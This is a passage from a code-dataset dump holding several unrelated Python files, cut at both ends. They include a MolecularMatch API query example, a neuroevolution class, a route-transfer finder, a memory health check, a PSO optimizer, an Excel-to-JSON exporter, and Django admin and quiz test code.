requests.post(url, json=payload)\n\n# Question: How does MolecularMatch classify this mutation in this condition?\nprint(r.json()['classifications'][0]['classification'])\n# Answer: actionable\n\n# Question: How many drugs approved and on label for the condition provided?\nprint(r.json()['classifications'][0]['drugsApprovedOnLabelCount'])\n# Answer: 0\n\n# Question: How many drugs approved but off-label for the condition provided?\nprint(r.json()['classifications'][0]['drugsApprovedOffLabelCount'])\n# Answer: 6\n\n# Question: What about experimental drugs?\nprint(r.json()['classifications'][0]['drugsExperimentalCount'])\n# Answer: 4\n\n# Question: How many clinical trials are open for this mutation and condition?\nprint(r.json()['classifications'][0]['trialCount'])\n# Answer: 24\n\n# Question: Is there a lot of research publications about this mutation in this condition?\nprint(r.json()['classifications'][0]['publicationCount'])\n# Answer: 47\n\n# Question: Ok, what are these 4 experimental drugs?\nurl = mmService + resourceURLs[\"drugSearch\"]\n# set geneExpand for Drug to False so drugs return only for V600E, not BRAF (see https://api.molecularmatch.com/#geneExpansion)\nfilters = [\n\t{'facet':'CONDITION','term':'Lung cancer'},\n\t{'facet':'MUTATION','term':'BRAF V600E', \"geneExpand\": {\"Drug\": False}}\n]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters,\n\t'mode': 'discovery'\n}\nr = requests.post(url, json=payload)\nfor drug in r.json()['rows']:\n\tprint(drug)\n\tif drug['approved'] == False:\n\t\tprint(drug['name'])\n\n# Answer:\n# Lgx818\n# Plx8394\n# BGB-283\n# Cep-32496\n\n##################################################################\n#####################BASIC QUERIES################################\n##################################################################\n\n####################search drugs##################################\n\nurl = mmService + resourceURLs[\"drugSearch\"]\nfilters = [{'facet':'CONDITION','term':'Lung cancer'}]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters,\n\t'mode': 'discovery' # 'criteriaunmet' # multiple modes avaiable for drugsearch. see api docs.\n}\nr = requests.post(url, json=payload)\nprint(json.dumps(r.json()))\n\n#####################search trials##################################\n\nurl = mmService + resourceURLs[\"trialSearch\"]\nfilters = [{'facet':'CONDITION','term':'Lung cancer'}]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters\n}\nr = requests.post(url, json=payload)\nprint(json.dumps(r.json()))\n\n# Search trials by various ID types\nfilters = [\n\t{\"facet\":\"ID\",\"term\":\"EUDRACT2017-003305-18\"}\n]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters\n}\nr = requests.post(url, json=payload)\nprint('r here')\nprint(r.json())\n\n#####################search publications#############################\n\nurl = mmService + resourceURLs[\"publicationSearch\"]\nfilters = [{'facet':'CONDITION','term':'Lung cancer'}]\npayload = {\n\t'apiKey': apiKey,\n\t'filters': filters\n}\nr = requests.post(url, json=payload)\nprint(json.dumps(r.json()))\n\n####################get mutation###################################\n\nurl = mmService + resourceURLs[\"mutationGet\"]\npayload = {\n\t'apiKey': apiKey,\n\t'name': 'BRAF V600E'\n}\nr = requests.get(url, params=payload)\nprint(json.dumps(r.json()))\n\n######################get gene#################################\n\nurl = mmService + resourceURLs[\"geneGet\"]\npayload = {\n\t'apiKey': apiKey,\n\t'symbol': 'BRAF'\n}\nr = requests.get(url, params=payload)\nprint(json.dumps(r.json()))\n\n######################classify mutation##############################\n\nurl = mmService + resourceURLs[\"mutationClassify\"]\npayload = {\n\t'apiKey': apiKey,\n\t'variant': 'EGFR T790M',\n\t'condition': 'Lung cancer'\n}\nr = requests.post(url, json=payload)\nprint(json.dumps(r.json()))\n","sub_path":"python/trialsAPI.py","file_name":"trialsAPI.py","file_ext":"py","file_size_in_byte":8729,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"267202237","text":"# -*- coding: utf-8 -*-\r\n''' Generation Class for NeuroEvolution '''\r\n\r\n### IMPORTS ###\r\nfrom ClassNeuralNet import NeuralNetwork\r\nimport numpy as np\r\n\r\n\r\n### CLASS ###\r\nclass Generation:\r\n \r\n ## CONSTRUCTOR ###\r\n def __init__(self, demography, fitFunction, inputs = 24, hidden = 10, output = 4, loading = False):\r\n ''' Set up the generation & parameters '''\r\n # Get thoose params if the Generation isn't loaded from a file\r\n self.demography = demography\r\n # Params for the NeuralNet\r\n self.inputs = inputs\r\n self.hidden = hidden\r\n self.output = output\r\n self.population = [NeuralNetwork(self.inputs, self.hidden, self.output) for i in range(self.demography)]\r\n # Mutation rate\r\n self.mr = 0.1\r\n # Fitness function\r\n self.fitFunction = fitFunction\r\n self.num_gen = 1\r\n self.getScores()\r\n \r\n ## METHODS ## \r\n def step(self):\r\n '''\r\n Make 1 step of genetic thing\r\n '''\r\n self.naturalselection()\r\n self.getScores()\r\n self.num_gen += 1\r\n \r\n \r\n def getScores(self):\r\n ''' Get the scores '''\r\n self.score = self.evaluate()\r\n self.total_score = self.get_total_score()\r\n self.best = self.get_best()\r\n \r\n \r\n def evaluate(self):\r\n '''\r\n Return an array with the list of the fitness scores\r\n must return the fitness value of the Network\r\n '''\r\n score = []\r\n current_best = 0\r\n # Get a Neural Net\r\n for i, nn in enumerate(self.population):\r\n score.append(self.fitFunction(nn))\r\n # Print the new score if it's better than the previous one\r\n if score[-1] > current_best:\r\n current_best = score[-1]\r\n print('Net :', i)\r\n print('Score :', current_best)\r\n print()\r\n return score\r\n \r\n def get_best(self):\r\n ''' Return the best Net of the population '''\r\n score_max = max(self.score)\r\n index_max = self.score.index(score_max)\r\n return self.population[index_max]\r\n \r\n \r\n def get_total_score(self):\r\n ''' Calculate it once so it won't calculate it each time it needs it '''\r\n total_score = 0\r\n for score in self.score:\r\n total_score += score\r\n return total_score\r\n \r\n \r\n def pickOne(self):\r\n ''' Pick a random brain of the population based on the score '''\r\n # Normalise the scores to have a prob\r\n self.score = np.array(self.score)\r\n self.prob = self.score / self.total_score\r\n self.score = list(self.score)\r\n # Pick a random number\r\n r = np.random.rand()\r\n for i in range(len(self.population)):\r\n r = r - self.prob[i]\r\n if r <= 0 :\r\n return self.population[i]\r\n \r\n \r\n def naturalselection(self):\r\n ''' Make a new generation '''\r\n # Save the best of the last population\r\n new_pop = [self.best]\r\n # Make the new genertion\r\n for i in range(1,self.demography):\r\n # Pick 2 parents for the crossover\r\n parent1 = self.pickOne()\r\n parent2 = self.pickOne()\r\n child = parent1.crossover(parent2)\r\n # Mutate the child (based on the mutation rate)\r\n child.mutate(self.mr)\r\n new_pop.append(child)\r\n self.population = new_pop\r\n","sub_path":"GeneticSnake/ClassGeneration.py","file_name":"ClassGeneration.py","file_ext":"py","file_size_in_byte":3514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"248225146","text":"import pandas as pd\nimport numpy as np\nimport time\nimport random\n\n\nclass Transfer(object):\n def __init__(self):\n self.train_info = pd.read_excel('./data/capital_train_info_0304.xls')\n self.plane_info = pd.read_excel('./data/capital_airplane_info_0304.xls')\n self.from_city = ''\n self.to_city = ''\n\n def start(self, from_city, to_city):\n self.from_city = from_city\n self.to_city = to_city\n\n route_info = self.select_station()\n results = self.filter(route_info)\n print(results)\n\n def select_station(self):\n train_info = self.train_info\n plane_info = self.plane_info\n from_city = self.from_city\n to_city = self.to_city\n\n train_transit = train_info[train_info['出发地'] == from_city][[\n '编号', '出发地', '到达地', '出发时间', '到达时间', '历时']]\n plane_transit = plane_info[plane_info['出发地'] == from_city][[\n '编号', '出发地', '到达地', '出发时间', '到达时间', '历时']]\n route_info = pd.concat([train_transit, plane_transit])\n transit_city = pd.unique(route_info['到达地'])\n\n result = [route_info]\n for city in transit_city:\n train_transit = (train_info[(train_info['出发地'] == city) &\n (train_info['到达地'] == to_city)][['出发地', '到达地', '出发时间', '到达时间', '历时']])\n plane_transit = (plane_info[(plane_info['出发地'] == city) &\n (plane_info['到达地'] == to_city)][['出发地', '到达地', '出发时间', '到达时间', '历时']])\n result.append(pd.concat([train_transit, plane_transit]))\n\n route_info = pd.concat(result)\n return route_info\n\n def filter(self, route_info):\n citys = pd.unique(route_info['到达地'])\n citys = citys[citys != self.to_city]\n\n # result = pd.DataFrame(columns=['出发城市', '出发时间', '到达时间', '耗时',\n # '中转城市', '中转停留', '出发时间', '到达时间',\n # '耗时', '到达城市'])\n\n result = []\n for city in citys:\n from_info = route_info[route_info['到达地'] == city].sort_values(by='历时')[:1]\n to_info = route_info[route_info['出发地'] == city].sort_values(by='历时')[:1]\n result.append(from_info)\n result.append(to_info)\n\n results = pd.concat(result)\n\n return results\n\n\n\n\nif __name__ == '__main__':\n trans = Transfer()\n s = time.time()\n trans.start('北京', '深圳')\n # try:\n # trans.start('北京', '深圳')\n # except:\n # print(time.time()-s)\n print(time.time() - s)","sub_path":"algorithm/Transfer_once/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2831,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"186248819","text":"from typing import Dict\n\nimport psutil\n\nfrom checks.base import Check\nfrom checks.results import Result\n\n\nclass MemoryCheck(Check):\n WARNING_THRESHOLD = 10\n ERROR_THRESHOLD = 10\n HOST = None\n\n @classmethod\n def run(cls) -> Dict:\n try:\n memory = psutil.virtual_memory()\n available = '{:n}'.format(int(memory.available / 1024 / 1024))\n if memory.available < (cls.ERROR_THRESHOLD * 1024 * 1024):\n result = Result(\n message='Memory available ({}) is below error threshold ({})'.format(\n available, cls.ERROR_THRESHOLD),\n severity=Result.ERROR\n )\n elif memory.available < (cls.ERROR_THRESHOLD * 1024 * 1024):\n result = Result(\n message='Memory available ({}) is below warning threshold ({})'.format(\n available, cls.WARNING_THRESHOLD),\n severity=Result.WARNING\n )\n else:\n result = Result()\n except ValueError:\n result = Result(\n message='An error was raised, try again later.',\n severity=Result.ERROR\n )\n return {'MEMORY': result}\n","sub_path":"platform/core/polyaxon/checks/memory.py","file_name":"memory.py","file_ext":"py","file_size_in_byte":1266,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"299990977","text":"Theatre_1 = {\"Name\":'Lviv',\n \"Seats_Number\":120,\n \"Actors_1\":[\"Andrew Kigan\",\"Jhon Speelberg\",\"Alan Mask\",\"Neil Bambino\"],\n \"Play_1\":[\"25/03/2018\",\"Aida\",80,\"Andrew Kigan\",\"Jhon Speelberg\",60,\"OK\"],\n \"Play_2\":[\"26/03/2018\",\"War\",220,\"Jhon Speelberg\",\"Jhon Speelberg\",\"Alan Mask\",\"Neil Bambino\",100,\"OK\"]\n }\nTheatre_2 = {\"Name\":'Sokil',\n \"Seats_Number\":110,\n \"Actors_2\":[\"Julia Portman\",\"Mary Lewis\",\"Carla Mask\",\"Neil Bambino\",\"Natalie Queen\"],\n \"Play_3\":[\"26/03/2018\",\"Rigoletto\",120,\"Mary Lewis\",\"Carla Mask\",\"Neil Bambino\",\"Natalie Queen\",80,\"OK\"],\n \"Play_4\":[\"27/03/2018\",\"Night Warriors\",90,\"Andrew Kigan\",\"Julia Portman\",\"Mary Lewis\",\"Carla Mask\",75,\"NO\"]\n }\n\n\nprint('Plays are: ' + str(Theatre_1[\"Play_1\"][1:2]) + ' ' + str(Theatre_1[\"Play_2\"][1:2]) + ' ' + str(Theatre_2[\"Play_3\"][1:2]) + ' ' + str(Theatre_2[\"Play_4\"][1:2]))\n\nprint('Number of actors of Lviv Theatre is : ' + str(len(Theatre_1[\"Actors_1\"])))\n\n\nOther_play = {\"Play_5\":[\"29/03/2018\",\"SomethingNew\",90,\"Andrew Kigan\",\"Julia Portman\",\"Carla Mask\",74,\"YES\"]}\nTheatre_2.update(Other_play)\n\nfree_tickets = Theatre_1.get(\"Play_1\")[2] - Theatre_1.get(\"Play_1\")[5]\nprint('Play ' + str(Theatre_1[\"Play_1\"][1:2]) + ', availiable tickets num = ' + str(free_tickets))\n\nprofit = Theatre_2.get(\"Play_3\")[2] * Theatre_2.get(\"Play_3\")[7]\nprint('Play ' + str(Theatre_2[\"Play_3\"][1:2]) + ', profit = ' + str(profit))\n\n\nOne_more_ticket = {\"Play_4\":[\"27/03/2018\",\"Night Warriors\",90,\"Andrew Kigan\",\"Julia Portman\",\"Mary Lewis\",\"Carla Mask\",76,\"NO\"]}\nTheatre_2.update(One_more_ticket)\nprint(Theatre_2)\n","sub_path":"home_task_3_1.py","file_name":"home_task_3_1.py","file_ext":"py","file_size_in_byte":1680,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"374343284","text":"from skimage import feature\nimport numpy as np\n\n\nclass LocalBinaryPatterns:\n def __init__(self, points, radius):\n self.points = points\n self.radius = radius\n\n def describe(self, image, eps=1e-7):\n # compute the rotation and grey-scale invariant form of LBPs (uniform)\n lbp = feature.local_binary_pattern(image, self.points, self.radius, method=\"uniform\")\n\n (hist, _) = np.histogram(lbp.ravel(), bins=np.arange(0, self.points + 2), range=(0, self.points + 1))\n\n # normalise the histogram\n hist = hist.astype(\"float\")\n hist /= (hist.sum() + eps)\n\n return hist\n","sub_path":"cbir/cvclasses/localbinarypatterns.py","file_name":"localbinarypatterns.py","file_ext":"py","file_size_in_byte":627,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"278269549","text":"from featureflow import Node, Aggregator\nimport os\nfrom soundfile import SoundFile\nimport requests\nimport json\nfrom urlparse import urlparse\n\n\nclass AudioMetaData(object):\n def __init__(\n self,\n uri=None,\n samplerate=None,\n channels=None,\n licensing=None,\n description=None,\n tags=None):\n super(AudioMetaData, self).__init__()\n self.uri = uri\n self.samplerate = samplerate\n self.channels = channels\n self.licensing = licensing\n self.description = description\n self.tags = tags\n\n def __eq__(self, other):\n return self.uri == other.uri \\\n and self.samplerate == other.samplerate \\\n and self.channels == other.channels \\\n and self.licensing == other.licensing \\\n and self.description == other.description \\\n and self.tags == other.tags\n\n\nclass AudioMetaDataEncoder(Aggregator, Node):\n content_type = 'application/json'\n\n def __init__(self, needs=None):\n super(AudioMetaDataEncoder, self).__init__(needs=needs)\n\n def _process(self, data):\n yield json.dumps({\n 'uri': data.uri.url\n if isinstance(data.uri, requests.Request) else data.uri,\n 'samplerate': data.samplerate,\n 'channels': data.channels,\n 'licensing': data.licensing,\n 'description': data.description,\n 'tags': data.tags\n })\n\n\nclass FreesoundOrgConfig(object):\n def __init__(self, api_key):\n super(FreesoundOrgConfig, self).__init__()\n self.api_key = api_key\n\n def request(self, _id):\n uri = 'http://freesound.org/apiv2/sounds/{_id}/'.format(_id=_id)\n params = {'token': self.api_key}\n metadata = requests.get(uri, params=params).json()\n request = requests.Request(\n method='GET',\n url=metadata['previews']['preview-hq-ogg'],\n params=params)\n return AudioMetaData(\n uri=request,\n samplerate=metadata['samplerate'],\n channels=metadata['channels'],\n licensing=metadata['license'],\n description=metadata['description'],\n tags=metadata['tags'])\n\n\nclass MetaData(Node):\n def __init__(self, needs=None):\n super(MetaData, self).__init__(needs=needs)\n\n @staticmethod\n def _is_url(s):\n if not isinstance(s, str):\n return False\n parsed = urlparse(s)\n return parsed.scheme and parsed.netloc\n\n @staticmethod\n def _is_local_file(s):\n try:\n return os.path.exists(s)\n except TypeError:\n return False\n\n @staticmethod\n def _is_file(s):\n try:\n s.tell()\n return True\n except AttributeError:\n return False\n\n def _process(self, data):\n if isinstance(data, AudioMetaData):\n yield data\n elif self._is_url(data):\n req = requests.Request(\n method='GET',\n url=data,\n headers={'Range': 'bytes=0-'})\n yield AudioMetaData(uri=req)\n elif isinstance(data, requests.Request):\n if 'range' not in data.headers:\n data.headers['range'] = 'bytes=0-'\n yield AudioMetaData(uri=data)\n elif self._is_local_file(data) or self._is_file(data):\n sf = SoundFile(data)\n yield AudioMetaData(\n uri=data,\n samplerate=sf.samplerate,\n channels=sf.channels)\n else:\n yield AudioMetaData(uri=data)\n","sub_path":"zounds/soundfile/audio_metadata.py","file_name":"audio_metadata.py","file_ext":"py","file_size_in_byte":3703,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"619012945","text":"import os\nimport glob\nimport json\nimport xlrd # must install xlrd!\n\n\nclass Excel2Data(object):\n \"\"\"\n export data from excels\n \"\"\"\n # define types\n TYPE_INT32 = 'int32'\n TYPE_INT64 = 'int64'\n TYPE_FLOAT = 'float'\n TYPE_DOUBLE = 'double'\n TYPE_Bool = 'bool'\n TYPE_STRING = 'string'\n\n def __init__(self, filename, input_path='./', output_path='dist/'):\n \"\"\"\n :param filename: output filename\n :param input_path: relative path\n :param output_path: relative path, default 'dist'\n \"\"\"\n self.filename = filename\n self.input_path = input_path\n self.output_path = output_path\n self.excel_sheets = []\n self.class_files = []\n\n\n\n def make_json(self):\n \"\"\"\n export json format file from excel sheet\n :return: None\n \"\"\"\n\n curpath = os.path.abspath(os.getcwd())\n print('curdir:', curpath)\n\n inputpath = os.path.normpath(os.path.join(curpath, self.input_path))\n os.chdir(inputpath)\n excel_files = glob.glob('*.xlsx')\n\n jsondata = \"{\"\n for excel in excel_files:\n if '~' in excel:\n continue\n book = xlrd.open_workbook(inputpath+excel)\n print(\"The number of worksheets is\", book.nsheets)\n print(\"Worksheet name(s):\", book.sheet_names())\n\n # for in excel sheet\n listlenght = len(book.sheet_names())\n listindex = 0\n for sheetname in book.sheet_names():\n listindex += 1\n print('==sheet name:{0}=='.format(sheetname))\n\n msgname = sheetname.lower()\n\n sheet = book.sheet_by_name(sheetname) # get sheet content\n row = 0\n fileds = []\n\n jsondata += \"\\\"{0}\\\":{1}\".format(msgname, \"[\")\n for r in range(0, sheet.nrows):\n row += 1\n index = 0 # col index\n if row > 1:\n jsondata += \"{\"\n\n for c in range(0, sheet.ncols):\n # print (\"Cell:\", sheet.cell_value(rowx=r, colx=c) )\n data = sheet.cell_value(rowx=r, colx=c)\n\n if row == 1:\n parts = data.partition('.')\n # field_type = parts[0] # field type\n field_real = parts[2] # filed name\n # fileds[index]=field_real\n fileds.append(data)\n # print('field name:{0}'.format(field_real),)\n # sys.stdout.write('{0},'.format(field_real))\n else:\n # if type(data) is types.StringType:\n # data = data.encode('utf-8')\n # print('{0}:{1}'.format(fileds[index],data) )\n fieldname = fileds[index]\n parts = fieldname.partition('.')\n fieldtype = parts[0]\n fieldname = parts[2]\n if fieldtype == 'int':\n data = int(data)\n elif fieldtype == 'float':\n data = float(data)\n elif fieldtype == 'double':\n data = float(data)\n elif fieldtype == 'string':\n data = str(data)\n\n # sys.stdout.write('{0},'.format(data))\n\n if fieldtype == 'string':\n jsondata += \"\\\"{0}\\\":\\\"{1}\\\"\".format(fieldname, data)\n else:\n jsondata += \"\\\"{0}\\\":{1}\".format(fieldname, data)\n if index < sheet.ncols-1:\n jsondata += \",\"\n\n index += 1\n if row > 1:\n jsondata += \"}\"\n if row < sheet.nrows:\n jsondata += \",\"\n jsondata += \"]\"\n if listindex < listlenght:\n jsondata += ','\n\n jsondata += \"}\"\n os.chdir(curpath)\n print(\"json:\" + jsondata)\n # io output\n output = os.path.normpath(os.path.join(curpath, self.output_path))\n output = output+self.filename+'.bin'\n with open(output, 'w', encoding='utf-8') as targetf:\n jsondata = json.dump(jsondata)\n targetf.write(jsondata)\n print(\"\\noutput:{0}\".format(output))\n\n os.chdir(curpath)\n","sub_path":"datapacker/build/lib/datapacker/excel2data.py","file_name":"excel2data.py","file_ext":"py","file_size_in_byte":4785,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"21803208","text":"from .base import BaseEA\n\n\n# paper\n# Shi, Y., & Eberhart, R. C. (1999, July). Empirical study of particle swarm optimization.\n# In Proceedings of the 1999 Congress on Evolutionary Computation-CEC99 (Cat. No. 99TH8406) (Vol. 3, pp. 1945-1950).\n# IEEE.\nclass PSO(BaseEA):\n def __init__(self, _np, n, upperxs, lowerxs, uppervs, lowervs, factors, **kwargs):\n BaseEA.__init__(self, _np, n, upperxs, lowerxs, factors, **kwargs)\n self.uppervs = uppervs\n self.lowervs = lowervs\n\n # 初始化速度\n for i in range(self.np):\n self.solutions[i].set_velocity(uppervs=self.uppervs, lowervs=self.lowervs)\n\n def get_factor_keys(self):\n return [\n 'w',\n 'r1',\n 'r2',\n ]\n\n def fit(self, gen):\n for i in range(gen):\n self.append_best_fitness()\n best_solution = self.solutions[self.current_best_index]\n\n w = self.factors['w'].generate(i)\n r1 = self.factors['r1'].generate(i)\n r2 = self.factors['r2'].generate(i)\n\n for j in range(self.np):\n self.solutions[j].update_velocity(best_solution.vector, w, r1, r2)\n self.solutions[j].amend_velocity(self.uppervs, self.lowervs, boundary_strategy=self.boundary_strategy)\n self.solutions[j].update_vector()\n self.solutions[j].amend_vector(self.upperxs, self.lowerxs, boundary_strategy=self.boundary_strategy)\n self.solutions[j].p_vector = self.compare(self.solutions[j].p_vector, self.solutions[j].vector)\n\n def compare(self, v1, v2):\n f1 = self.ff(v1)\n f2 = self.ff(v2)\n\n if (self.optimal_minimal and f1 < f2) or (not self.optimal_minimal and f1 > f2):\n return v1\n\n return v2\n","sub_path":"eas/PSO.py","file_name":"PSO.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"47489237","text":"from django.contrib import admin\nfrom lottery.models import Question, Prize, LotteryRecord,PrizeConfiguration,Coupon, LotteryConfiguration\nfrom django.contrib.admin import DateFieldListFilter\n\nclass QuestionAdmin(admin.ModelAdmin):\n\tlist_display = ('question','answer')\n\tordering = ('id',)\n\nclass PrizeAdmin(admin.ModelAdmin):\n\tlist_display = ('name','quantity','use_count')\n\tordering = ('id',)\n\nclass CouponAdmin(admin.ModelAdmin):\n\tlist_display = ('name','code','status')\n\tsearch_fields = ('name','code', 'status')\n\nclass LotteryRecordAdmin(admin.ModelAdmin):\n\tlist_display = ('username','mobile','level','ip','format_lottery_time','prize_name','format_comedate','format_identity')\n\tsearch_fields = ('username','mobile', 'prize_name')\n\tlist_filter = (\n ('lottery_time', DateFieldListFilter),\n )\n\tdef format_lottery_time(self,obj):\n\t\treturn obj.lottery_time.strftime('%Y-%m-%d, %H:%M:%S')\n\tdef format_comedate(self,obj):\n\t\tif obj.comedate is None:\n\t\t\treturn ''\n\t\telse:\n\t\t\treturn obj.comedate.strftime('%Y-%m-%d')\n\tdef format_identity(self,obj):\n\t\tif obj.identity is None:\n\t\t\treturn ''\n\t\telse:\n\t\t\treturn obj.identity\n\t\t\n\nclass PrizeConfigurationAdmin(admin.ModelAdmin):\n\tlist_display = ('prize','lottery_date','count','use_count')\n\tdef lottery_date(self,obj):\n\t\treturn obj.date.strftime('%Y-%m-%d')\n\tlist_filter = (\n ('date', DateFieldListFilter),\n )\n\t\nclass LotteryConfigurationAdmin(admin.ModelAdmin):\n\tlist_display = ('type','string_value','int_value')\n\tsearch_fields = ('type','string_value','int_value')\n\t\n\n\nadmin.site.register(Question,QuestionAdmin)\nadmin.site.register(Prize,PrizeAdmin)\nadmin.site.register(LotteryRecord,LotteryRecordAdmin)\nadmin.site.register(PrizeConfiguration,PrizeConfigurationAdmin)\nadmin.site.register(Coupon,CouponAdmin)\nadmin.site.register(LotteryConfiguration,LotteryConfigurationAdmin);\n","sub_path":"lottery/admin.py","file_name":"admin.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"599754248","text":"import json\nimport bcrypt\nimport jwt\nfrom pprint import pprint\n\nfrom .views import *\nfrom advertisement.models import *\nfrom quiz.models import *\nfrom user.models import *\nfrom adwards.settings import SECRET_KEY\n\nfrom django.test import TestCase, Client\n\nclass QuizModelTest(TestCase):\n def setUp(self):\n industry_type = IndustryType.objects.create(\n id=1,\n name='교육사업'\n )\n ad_category = AdvertisementCategory.objects.create(\n id=1,\n name='교육'\n )\n tag = Tag.objects.create(\n id=1,\n name='coding bootcamp'\n )\n bytes_pw = bytes('1234', 'utf-8')\n hashed_pw = bcrypt.hashpw(bytes_pw, bcrypt.gensalt())\n advertiser = Advertiser.objects.create(\n id=1,\n email='wecode@grace.co',\n password=hashed_pw.decode('utf-8'),\n company_name='wecode',\n balance='1000000',\n business_license_number='10-345630291-01',\n industry_type=industry_type,\n contact='010-0000-0000',\n company_address='서울특별시 강남구 삼성동 테헤란로 427',\n company_description='3개월만에 개발자! 될 수 있습니다. 코딩부트캠프 wecode!',\n homepage='https://wecode.co.kr',\n thumbnail='https://s3.ap-northeast-2.amazonaws.com/cdn.wecode.co.kr/landing/bootcamp/boot_4.jpg',\n )\n advertisement = Advertisement.objects.create(\n id=1,\n title='3개월만에 개발자?',\n description='개발자가 되는 가장 빠른 길, wecode!',\n advertiser=advertiser,\n ad_category=ad_category,\n video_link='https://youtu.be/h_XWL253eEY',\n budget='100000',\n price_per_view='100',\n switch=True\n )\n advertisement_tag = AdvertisementTag(\n id=1,\n advertisement=advertisement,\n tag=tag\n )\n question_type = QuestionType.objects.create(\n id=2,\n name='multi_choices'\n )\n answer_type = AnswerType.objects.create(\n id=2,\n name='multi_answer'\n )\n questions = Question.objects.create(\n id = 1,\n advertisement = advertisement,\n question_type = question_type,\n answer_type = answer_type,\n title = '위코드',\n content = '현재 교육중인 기수는 3기다.'\n )\n questions_2 = Question.objects.create(\n id = 2,\n advertisement = advertisement,\n question_type = question_type,\n answer_type = answer_type,\n title = '위코드',\n content = '현재 교육중인 기수는 몇명일까요?'\n )\n choices_1 = Choices.objects.create(\n id = 1,\n question = questions,\n content = 'o'\n )\n choices_2 = Choices.objects.create(\n id = 2,\n question = questions,\n content = 'x'\n )\n choices_3 = Choices.objects.create(\n id = 3,\n question = questions_2,\n content = '12'\n )\n choices_4 = Choices.objects.create(\n id = 4,\n question = questions_2,\n content = '15'\n )\n choices_5 = Choices.objects.create(\n id = 5,\n question = questions_2,\n content = '20'\n )\n choices_6 = Choices.objects.create(\n id = 6,\n question = questions_2,\n content = '21'\n )\n\n answer = Answer.objects.create(question = questions, choices_id=1)\n answers = [\n Answer(question = questions_2, choices_id=choice)\n for choice in [3, 4]\n ]\n answer_2 = Answer.objects.bulk_create(answers)\n \n state = State.objects.create(id = 1, name = \"서울\")\n gender = Gender.objects.create(id = 1, name = \"남자\")\n bank = Bank.objects.create(id = 1, name = \"우리은행\")\n bytes_pw = bytes('1234', 'utf-8')\n hashed_pw = bcrypt.hashpw(bytes_pw, bcrypt.gensalt())\n user = User.objects.create(\n id = 1,\n user_name = \"한바름\",\n nickname = \"별명\",\n email = \"mail@mail.com\",\n password = hashed_pw.decode('utf-8'),\n age = 30,\n state_id = 1,\n gender_id = 1,\n cellphone = '01012341234',\n thumbnail = \"https://www.notion.so/Django-test-py-8e2b1605e5864357bcd05971f23f686d\",\n bank_id = 1,\n account_owner = \"한바름\",\n account_number = \"010010010\",\n )\n interests = [\n InterestsType(pk = id, name = interest)\n for id, interest in zip(range(1,4), ['코딩','컴퓨터', '위워크', '위코드'])\n ]\n InterestsType.objects.bulk_create(interests)\n for interest in interests:\n user.interests.add(interest)\n \n def test_question_create_view_positive(self):\n c = Client()\n \n login_test = {\n \"email\":\"wecode@grace.co\",\n \"password\":\"1234\"\n }\n\n test = {\n \"ad_id\":1,\n \"quizzes\":\n [\n {\n 'title':'hello_wecode',\n 'content':'wecode는 현재 교육중인 기수는 3기이다.',\n 'choices':['o','x'],\n 'answers':['o']\n }\n ]\n }\n\n login_response = c.post(\"/signin/advertiser\", data=json.dumps(login_test), content_type=\"application/json\")\n access_token = login_response.json()[\"access_token\"]\n response = c.post(\"/quiz\", data=json.dumps(test), HTTP_AUTHORIZATION=access_token, content_type='application/json')\n self.assertEqual(response.status_code, 200)\n \n def test_question_create_view_negative(self):\n c = Client()\n \n login_test = {\n \"email\":\"wecode@grace.co\",\n \"password\":\"1234\"\n }\n\n test = {\n \"ad_id\":1,\n \"quizzes\":\n [\n {\n 'title':'hello_wecode',\n 'content':'wecode는 현재 교육중인 기수는 3기이다.',\n 'choices':['o','x'],\n 'answers':['o']\n },\n {\n 'title':'hello_wecode',\n 'content':'wecode는 현재 교육중인 기수는 3기이다.',\n 'choices':['o','x'],\n 'answers':['o']\n }\n ]\n }\n\n login_response = c.post(\"/signin/advertiser\", data=json.dumps(login_test), content_type=\"application/json\")\n access_token = login_response.json()[\"access_token\"]\n response = c.post(\"/quiz\", data=json.dumps(test), HTTP_AUTHORIZATION=access_token, content_type='application/json')\n self.assertEqual(response.status_code, 200) \n\n def test_question_correct_view_positive(self):\n c = Client()\n \n login_test = {\n \"email\":\"mail@mail.com\",\n \"password\":\"1234\"\n }\n\n test = {\n \"ad_id\":1,\n \"user_answers\": [\n {\"quiz_id\": 1, \"answers\": [1]},\n {\"quiz_id\": 2, \"answers\": [3,4]}\n ]\n }\n \n login_response = c.post(\"/signin/user\", data=json.dumps(login_test), content_type=\"application/json\")\n access_token = login_response.json()[\"access_token\"]\n response = c.post(\"/quiz/answer\", data=json.dumps(test), HTTP_AUTHORIZATION=access_token, content_type='application/json')\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json(), {\"message\":True})\n \n def test_question_correct_view_negaitive(self):\n c = Client()\n \n login_test = {\n \"email\":\"mail@mail.com\",\n \"password\":\"1234\"\n }\n\n test = {\n \"ad_id\":1,\n \"user_answers\": [\n {\"quiz_id\": 1, \"answers\": [1]},\n {\"quiz_id\": 2, \"answers\": [3,4,5]}\n ]\n }\n\n login_response = c.post(\"/signin/user\", data=json.dumps(login_test), content_type=\"application/json\")\n access_token = login_response.json()[\"access_token\"]\n response = c.post(\"/quiz/answer\", data=json.dumps(test), HTTP_AUTHORIZATION=access_token, content_type='application/json')\n self.assertEqual(response.status_code, 200)\n self.assertEqual(response.json(), {\"message\":False})\n\n def test_question_list_view_positive(self):\n c = Client()\n\n response = 